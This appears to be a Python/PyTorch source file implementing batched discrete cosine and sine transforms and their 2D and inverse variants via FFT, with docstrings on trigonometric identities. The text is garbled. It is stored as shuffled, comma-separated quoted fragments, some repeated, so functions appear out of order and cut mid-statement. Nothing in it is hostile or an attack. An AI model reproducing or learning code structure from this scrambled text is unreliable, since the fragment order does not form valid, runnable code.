dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad =", "real part @param x batch 1D tensor for conversion @param", "0:N:2] = y[..., :(N+1)//2, 0] z[..., 1:N:2] = y[..., (N+1)//2:,", "make later multiplication easier. \"\"\" pik_by_2N = torch.arange(N, dtype=dtype, device=device)", "part \"\"\" # last dimension N = x.size(-1) # pad", "2*(N//2)-1, 2*(N//2)-3, ..., 3, 1 \"\"\" perm = torch.zeros(N, dtype=dtype,", "dct_2N(x, expk=None): \"\"\" Batch Discrete Cosine Transformation without normalization to", "expk_1) def idcst2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete", "Transformation without normalization to coefficients. Compute idct(idxst(x)). @param x batch", "x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DCT twice. @param x", "if perm is None: perm = get_perm(N, dtype=torch.int64, device=x.device) if", "is MxN @param expk0 with length M @param expk1 with", "def idct_N(x, expk=None): N = x.size(-1) if expk is None:", "1/2 * (sin(a+b) + sin(a-b)) cos(a) sin(b) = 1/2 *", "without normalization to coefficients. Compute 1D DCT twice. @param x", "Sine-Cosine Transformation without normalization to coefficients. Compute idxst(idct(x)) @param x", "return expk.contiguous() def get_expkp1(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*(u+1)/(2N)), but", "torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag] y.mul_(N) if len(x.size()) == 1:", "# pad last dimension x_pad = F.pad(x, (0, N), 'constant',", "DCT. @param x batch tensor, the 2D part is MxN", "without normalization to coefficients. Compute y_u = \\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)),", "numbers introduce a new dimension # Must use IFFT here", "the 2D part is MxN @param expkp1_0 with length M", "cos(pi/N*q*(v+0.5)) Compute 1D DCT twice. @param x batch tensor, the", "2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3, 1 \"\"\" perm = torch.zeros(N,", "\"\"\" Batch 2D Discrete Cosine Transformation without normalization to coefficients.", "v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))). By mapping the original", "expkp1=None): \"\"\" Batch Discrete Sine Transformation without normalization to coefficients.", "device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, sin # I use sin because", "2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1)", "is MxN @param expk_0 with length M, 2*exp(-1j*pi*k/(2M)) @param expk_1", "= torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin expk =", "mapping the original image from (i, j) to (i, N-j),", "def get_expk(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)), but not exactly", "easier for multiplication expk = torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1) expk.mul_(2) return", "will be easier for multiplication expk = torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1)", "by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expk) # pad second last dimension,", "expkp1_0 with length M @param expkp1_1 with length N \"\"\"", "cos(a+b)) cos(a) cos(b) = 1/2 * (cos(a-b) + cos(a+b)) sin(a)", "normal way should multiply 0.25 x_reorder.mul_(0.5) y = torch.ifft(x_reorder, signal_ndim=1,", "zeros 3. Perform IFFT 4. Extract the real part \"\"\"", "for multiplication expk = torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous()", "x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[..., 0]) x_reorder[..., 1].add_(x.mul(expk[..., 1]))", "sin(a) sin(b) = 1/2 * (cos(a-b) - cos(a+b)) cos(a) cos(b)", "= \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the N permuting trick to", "1D DST twice. @param x batch tensor, the 2D part", "N = x.size(-1) if expk is None: expk = get_expk(N,", "- cos(a+b)) cos(a) cos(b) = 1/2 * (cos(a-b) + cos(a+b))", "= x.size(-1) if expk is None: expk = get_expk(N, dtype=x.dtype,", "part # this will be easier for multiplication expk =", "Batch Discrete Cosine Transformation without normalization to coefficients. Compute y_u", "cos_or_sin_flag, expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation without normalization", "normalization to coefficients. Compute y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements", "dimension here becomes -2 because complex numbers introduce a new", "idcct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Cosine-Cosine Transformation", "for multiplication expk = torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous()", "2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3, 1 \"\"\"", "= y.sum(dim=-1) return y[..., 0]+y[..., 1] def idct_2N(x, expk=None): \"\"\"", "y.mul_(N) z = torch.empty_like(x) z[..., 0:N:2] = y[..., :(N+1)//2, 0]", "y = torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :] y.mul_(1.0/N) if", "back x_reorder.transpose_(dim0=-2, dim1=-1) y = torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[..., 0:N,", "\"\"\" Batch 2D Discrete Sine Transformation without normalization to coefficients.", "the 2D part is MxN @param expk0 with length M", "dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, sin # I use sin", "1])) # this is to match idct_2N # normal way", "expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0,", "introduce a new dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[...,", "-2 because complex numbers introduce a new dimension # Must", "expk0 with length M @param expk1 with length N \"\"\"", "M, 2*exp(-1j*pi*k/(2M)) @param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return", "def dct_N(x, perm=None, expk=None): \"\"\" Batch Discrete Cosine Transformation without", "exploited by prosthaphaeresis relate products of trigonometric functions to sums.", "N \"\"\" return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def idct2_N(x,", "because the real part requires subtraction # this will be", "dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1, :] if", "\"\"\" return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1) #", "solve DCT with FFT in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1.", "I use sin because the real part requires subtraction #", "dimension x_pad = F.pad(x, (0, N), 'constant', 0) # the", "dtype, device): \"\"\" Compute permutation to generate following array 0,", "= \\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)), Impelements the 2N padding trick to", "DST twice. @param x batch tensor, the 2D part is", "or sine transformation @param expk 2*exp(j*pi*k/(2N)) \"\"\" # last dimension", "x.size(-1) # pad last dimension x_pad = F.pad(x, (0, N),", "== 1: x_pad.unsqueeze_(0) # the last dimension here becomes -2", "import pdb \"\"\" Discrete spectral transformation leveraging fast fourier transform", "return z def dst(x, expkp1=None): \"\"\" Batch Discrete Sine Transformation", "to solve DCT with FFT in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft", "with length N \"\"\" return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1)", "perm, :] x_reorder = x_reorder.index_select(dim=-2, index=perm) # switch back x_reorder.transpose_(dim0=-2,", "identities exploited by prosthaphaeresis relate products of trigonometric functions to", "multiply by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expkp1) # pad second last", "M @param expkp1_1 with length N \"\"\" return dst(dst(x.transpose(dim0=-2, dim1=-1),", "= torch.empty_like(x) z[..., 0:N:2] = y[..., :(N+1)//2, 0] z[..., 1:N:2]", "prosthaphaeresis relate products of trigonometric functions to sums. sin(a) sin(b)", "expk = get_expk(N, dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad", "N permuting trick to solve DCT with FFT in the", "# the last dimension here becomes -2 because complex numbers", "dimension # Must use IFFT here y = torch.ifft(x_pad, signal_ndim=1,", "expk1) def dst2(x, expkp1_0=None, expkp1_1=None): \"\"\" Batch 2D Discrete Sine", "\"\"\" Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization to", "Compute 1D DST and then 1D DCT. @param x batch", "but not exactly the same. The actual return is 2*cos(pi*(u+1)/(2N)),", "normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0)", "with length N \"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)", "Inverse Discrete Cosine Transformation without normalization to coefficients. Compute y_u", "the same. The actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N", "1].add_(x.mul(expk[..., 1])) # this is to match idct_2N # normal", "#y = y.sum(dim=-1) return y[..., 0]+y[..., 1] def idct_2N(x, expk=None):", "= torch.arange(0, N, 2, dtype=dtype, device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0,", "if len(x.size()) == 1: x_pad.unsqueeze_(0) # the last dimension here", "== 1: y.squeeze_(0) return y def idxt(x, cos_or_sin_flag, expk=None): \"\"\"", "2*exp(-1j*pi*k/(2M)) @param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x,", "@param expk 2*exp(j*pi*k/(2N)) \"\"\" # last dimension N = x.size(-1)", "@author <NAME> # @date Jun 2018 # import os import", "v*j/N)) = \\sum_i \\sum_j x_{i, j} (cos(-2*pi*(u*i/M + v*j/N)) +", "expk_1) def idsct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete", "0, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1),", "def idsct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Sine-Cosine", "solve IDCT with IFFT in the following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1.", "2. Pad x by zeros 3. Perform IFFT 4. Extract", "last dimension here becomes -2 because complex numbers introduce a", "# return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1) def", "sys import numpy as np import torch import torch.nn.functional as", "0:N] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y def", "return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1) # return", "a new dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N,", "signal_sizes=[2*N])[..., 0:N] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y", "expk0=None, perm1=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation without", "sin(pi*(2i+1)*(u+1)/(2N)), Impelements the 2N padding trick to solve DCT with", "x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N)) = \\sum_i \\sum_j x_{i, j}", "Batch Inverse Discrete Cosine Transformation without normalization to coefficients. Compute", "sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DST and then 1D DCT. @param", "-cos # I swap -cos and sin because we need", "2D Discrete Sine Transformation without normalization to coefficients. Compute 1D", "this will be easier for multiplication expk = torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()],", "x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0) if", "actual return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). This will make later multiplication", "if expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device) #", "cos(a) cos(b) = 1/2 * (cos(a-b) + cos(a+b)) sin(a) cos(b)", "idxt(x, cos_or_sin_flag, expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation without", "0] = x x_reorder[..., 1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[...,", "\\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DCT twice.", "= get_expkp1(N, dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad =", "0, 0, N), 'constant', 0) if len(x.size()) == 1: x_pad.unsqueeze_(0)", "dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expk) #", "return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1) def idct2_2N(x,", "expk_1 with length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2,", "expkp1=None): \"\"\" Batch Inverse Discrete Sine Transformation without normalization to", "Batch 2D Inverse Discrete Cosine-Cosine Transformation without normalization to coefficients.", "= torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N] y.mul_(N) if len(x.size())", "to match idct_2N # normal way should multiply 0.25 x_reorder.mul_(0.5)", "expk.contiguous() def get_exact_expk(N, dtype, device): # Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N))", "\\sum_i x_i cos(pi*(2u+1)*i/(2N)), Impelements the 2N padding trick to solve", "N+1, dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos # I swap", "expk = torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_exact_expk(N,", "will make later multiplication easier. \"\"\" pik_by_2N = torch.arange(N, dtype=dtype,", "dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2,", "computes following equation, which is slightly different from standard DCT", "coefficients. Compute idct(idxst(x)). @param x batch tensor, the 2D part", "expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device) size =", "idct_idxst(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse Discrete Cosine-Sine Transformation", "Must use IFFT here y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N,", "def dct_2N(x, expk=None): \"\"\" Batch Discrete Cosine Transformation without normalization", "dim1=-1) y = torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :] y.mul_(1.0/N)", "cos(pi*(2u+1)*i/(2N)), Impelements the 2N padding trick to solve IDCT with", "mainly uses Prosthaphaeresis properties. The trigonometric identities exploited by prosthaphaeresis", "(cos(a-b) + cos(a+b)) sin(a) cos(b) = 1/2 * (sin(a+b) +", "dim1=-1), perm=perm1, expk=expk1) def idct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D", "permutation to generate following array 0, 2, 4, ..., 2*(N//2)-2,", "signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0)", "torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_exact_expk(N, dtype, device):", "the following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply by 2*exp(1j*pi*u/(2N)) 2. Pad", "# switch back x_reorder.transpose_(dim0=-2, dim1=-1) y = torch.rfft(x_reorder, signal_ndim=1, normalized=False,", "exp(-j*2*pi*(u*i/M + v*j/N)) = \\sum_i \\sum_j x_{i, j} (cos(-2*pi*(u*i/M +", "v*j/N) inside exp. This will enable us to derive various", "1D DST and then 1D DCT. @param x batch tensor,", "imag part # this will be easier for multiplication expk", "dim1=-1), 0, expk_1) def idcst2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D", "coefficients. Compute y_u = \\sum_i x_i cos(pi*(2u+1)*i/(2N)), Impelements the 2N", "dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dst2(x, expkp1_0=None, expkp1_1=None): \"\"\" Batch", "the N permuting trick to solve DCT with FFT in", "Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization to coefficients.", "Compute idxst(idct(x)) @param x batch tensor, the 2D part is", "1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idcst2(x, expk_0=None, expk_1=None): \"\"\"", "x such that [a, b, c, d, e, f] becomes", "by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expkp1) # pad second last dimension,", "len(x.size()) == 1: y.squeeze_(0) return y def idct_N(x, expk=None): N", "torch.zeros(N, dtype=dtype, device=device) perm[0:(N-1)//2+1] = torch.arange(0, N, 2, dtype=dtype, device=device)", "# normal way should multiply 0.25 x_reorder.mul_(0.5) y = torch.ifft(x_reorder,", "signal_ndim=1, normalized=False) y.mul_(N) z = torch.empty_like(x) z[..., 0:N:2] = y[...,", "link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. permute x such that [a, b, c,", "sin(a) cos(b) = 1/2 * (sin(a+b) + sin(a-b)) cos(a) sin(b)", "this is to match idct_2N # normal way should multiply", "without normalization to coefficients. Compute 1D DST twice. @param x", "\"\"\" # last dimension N = x.size(-1) if expk is", "d, b] 2. Perform FFT 3. Multiply by 2*exp(-1j*pi*u/(2N)) 4.", "expk0).transpose_(dim0=-2, dim1=-1), expk1) def dst2(x, expkp1_0=None, expkp1_1=None): \"\"\" Batch 2D", "@param expk1 with length N \"\"\" return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2,", "1. Multiply by 2*exp(1j*pi*u/(2N)) 2. Pad x by zeros 3.", "N \"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dct2_N(x,", "2D Inverse Discrete Cosine-Sine Transformation without normalization to coefficients. It", "perm0 with length M @param expk0 with length M @param", "dimension, excluding the complex number dimension x_pad = F.pad(x_pad, (0,", "sin(a-b)) cos(a) sin(b) = 1/2 * (sin(a-b) - sin(a+b)) A", "length M, 2*exp(-1j*pi*k/(2M)) @param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) '''", "f] becomes [a, c, e, f, d, b] 2. Perform", "fast fourier transform engine. The math here mainly uses Prosthaphaeresis", "the imag part # this will be easier for multiplication", "# sin, -cos # I swap -cos and sin because", "and then 1D DST. @param x batch tensor, the 2D", "pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1) return", "torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1] y.mul_(N) if len(x.size()) ==", "'constant', 0) # the last dimension here becomes -2 because", "is None: expk = get_expk(N, dtype=x.dtype, device=x.device) # get real", "# get real part y.mul_(expk) # I found add is", "get_expk(N, dtype=x.dtype, device=x.device) # get real part y.mul_(expk) # I", "normalized=False) y.mul_(N) z = torch.empty_like(x) z[..., 0:N:2] = y[..., :(N+1)//2,", "expk1) def idct2_N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine", "1. Pad x by zeros 2. Perform FFT 3. Multiply", "return perm def dct_2N(x, expk=None): \"\"\" Batch Discrete Cosine Transformation", "without normalization to coefficients. Compute idxst(idct(x)) @param x batch tensor,", "x batch 1D tensor for conversion @param cos_or_sin_flag 0 for", "in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad x by zeros", "Impelements the N permuting trick to solve DCT with FFT", "2018 # import os import sys import numpy as np", "0.25 x_reorder.mul_(0.5) y = torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N) z =", "get_expk(N, dtype=x.dtype, device=x.device) size = list(x.size()) size.append(2) x_reorder = torch.zeros(size,", "1D DCT and then 1D DST. @param x batch tensor,", "dim1=-1), 1, expk_1) def idxst_idct(x, expk_0=None, expk_1=None): ''' Batch 2D", "\\sum_i \\sum_j x_{i, j} (cos(-2*pi*(u*i/M + v*j/N)) + j sin(-2*pi*(u*i/M", "0]) x_reorder[..., 1].add_(x.mul(expk[..., 1])) # this is to match idct_2N", "dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None): \"\"\" Batch 2D Discrete Cosine", "os import sys import numpy as np import torch import", "1/2 * (cos(a-b) + cos(a+b)) sin(a) cos(b) = 1/2 *", "\\sum_j x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N)) = \\sum_i \\sum_j x_{i,", "a new dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1,", "dtype=torch.int64, device=x.device) if x.ndimension() <= 1: x_reorder = x.view([1, N])", "length M @param expk1 with length N \"\"\" return idct_N(idct_N(x.transpose(dim0=-2,", "expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idcst2(x, expk_0=None, expk_1=None): \"\"\" Batch", "FFT 3. Multiply by 2*exp(-1j*pi*u/(2N)) 4. Extract the real part", "dst(x, expkp1=None): \"\"\" Batch Discrete Sine Transformation without normalization to", "will be easier for multiplication expk = torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1)", "f, d, b] 2. Perform FFT 3. Multiply by 2*exp(-1j*pi*u/(2N))", "Inverse Discrete Sine Transformation without normalization to coefficients. Compute y_u", "1D DST. @param x batch tensor, the 2D part is", "normalized=False, onesided=True)[..., 0:N, :] y.mul_(1.0/N) if expk is None: expk", "@param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 1,", "here mainly uses Prosthaphaeresis properties. The trigonometric identities exploited by", "enable us to derive various cos/sin transformation by computing FFT", "sin because the real part requires subtraction # this will", "expk1 with length N \"\"\" return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1),", "expkp1 is None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # multiply", "2*exp(j*pi*k/(2N)) \"\"\" # last dimension N = x.size(-1) if expk", "perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device) return perm def", "if len(x.size()) == 1: y.squeeze_(0) return y def dct2_2N(x, expk0=None,", "# Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) - j * sin(pi*u/(2N)) pik_by_2N", "\"\"\" Discrete spectral transformation leveraging fast fourier transform engine. The", "real part y.mul_(expk) # I found add is much faster", "<gh_stars>10-100 ## # @file discrete_spectral_transform.py # @author <NAME> # @date", "0]) - y[..., 0].mul(expkp1[:, 1]) return y def idst(x, expkp1=None):", "the 2N padding trick to solve DCT with FFT in", "\"\"\" return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def idct2_N(x, expk0=None,", "expk_1=None): \"\"\" Batch 2D Inverse Discrete Cosine-Cosine Transformation without normalization", "- j * sin(pi*u/(2N)) pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N))", "expkp1_1 with length N \"\"\" return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1),", "Discrete Cosine Transformation without normalization to coefficients. Compute 1D DCT", "becomes [a, c, e, f, d, b] 2. Perform FFT", "\"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) #", "@param expk_0 with length M, 2*exp(-1j*pi*k/(2M)) @param expk_1 with length", "torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :] y.mul_(1.0/N) if expk is", "dtype=x.dtype, device=x.device) x_reorder[..., 0] = x x_reorder[..., 1:, 1] =", "length N \"\"\" return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def", "with length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1),", "#x_reorder = x_reorder[..., perm, :] x_reorder = x_reorder.index_select(dim=-2, index=perm) #", "found add is much faster than sum #y = y.sum(dim=-1)", "Discrete spectral transformation leveraging fast fourier transform engine. The math", "Impelements the 2N padding trick to solve IDCT with IFFT", "the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. permute x such that [a,", "x_reorder.index_select(dim=-2, index=perm) # switch back x_reorder.transpose_(dim0=-2, dim1=-1) y = torch.rfft(x_reorder,", "expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1) def idct2_2N(x, expk0=None, expk1=None): \"\"\" Batch", "x_reorder[..., perm, :] x_reorder = x_reorder.index_select(dim=-2, index=perm) # switch back", "x_pad = x.unsqueeze(-1).mul(expkp1) # pad second last dimension, excluding the", "def dst(x, expkp1=None): \"\"\" Batch Discrete Sine Transformation without normalization", "Perform FFT 3. Multiply by 2*exp(-1j*pi*u/(2N)) 4. Extract the real", "3. Perform IFFT 4. Extract the real part \"\"\" #", "use IFFT here y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag]", "sin, -cos # I swap -cos and sin because we", "Cosine-Cosine Transformation without normalization to coefficients. It computes following equation,", "\"\"\" Batch 2D Inverse Discrete Cosine-Cosine Transformation without normalization to", "DCT with FFT in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. permute", "index=perm) # switch back x_reorder.transpose_(dim0=-2, dim1=-1) y = torch.rfft(x_reorder, signal_ndim=1,", "y = torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N) z = torch.empty_like(x) z[...,", "tensor, the 2D part is MxN @param expk_0 with length", "idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idsct2(x, expk_0=None,", "2D part is MxN @param expk0 with length M @param", "\"\"\" Batch Inverse Discrete Cosine Transformation without normalization to coefficients.", "v} = \\sum_p \\sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D", "is None: expk = get_expk(N, dtype=x.dtype, device=x.device) size = list(x.size())", "Compute y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the 2N padding", "expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) def idct_idxst(x, expk_0=None, expk_1=None): '''", "\"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dct2_N(x, perm0=None,", "batch tensor, the 2D part is MxN @param expk_0 with", "to column-major for speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder = x_reorder[..., perm,", "with length M @param perm1 with length N @param expk1", "np import torch import torch.nn.functional as F import pdb \"\"\"", "expk.mul_(2) return expk.contiguous() def get_expkp1(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*(u+1)/(2N)),", "idcst2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Cosine-Sine Transformation", "to derive various cos/sin transformation by computing FFT twice. \"\"\"", "b, c, d, e, f] becomes [a, c, e, f,", "None: expk = get_expk(N, dtype=x.dtype, device=x.device) size = list(x.size()) size.append(2)", "becomes -2 because complex numbers introduce a new dimension #", "v*j/N))). By mapping the original image from (i, j) to", "e, f] becomes [a, c, e, f, d, b] 2.", "to sums. sin(a) sin(b) = 1/2 * (cos(a-b) - cos(a+b))", "return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) # return", "(i, N-j), we can have (u*i/M - v*j/N) inside exp.", "0, -2, dtype=dtype, device=device) return perm def dct_2N(x, expk=None): \"\"\"", "@param expk0 with length M @param perm1 with length N", "transform engine. The math here mainly uses Prosthaphaeresis properties. The", "y[..., 0]+y[..., 1] def dct_N(x, perm=None, expk=None): \"\"\" Batch Discrete", "2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) #", "we can have (u*i/M - v*j/N) inside exp. This will", "def dct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation", "#y = y.sum(dim=-1) return y[..., 0]+y[..., 1] def dct_N(x, perm=None,", "expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad", "<NAME> # @date Jun 2018 # import os import sys", "device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)), but not exactly the same. The", "= y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return z def dst(x, expkp1=None): \"\"\"", "0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idsct2(x, expk_0=None, expk_1=None): \"\"\"", "# this will be easier for multiplication expk = torch.stack([pik_by_2N.cos(),", "following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad x by zeros 2. Perform", "- y[..., 0].mul(expkp1[:, 1]) return y def idst(x, expkp1=None): \"\"\"", "y = torch.rfft(x_pad, signal_ndim=1, normalized=False, 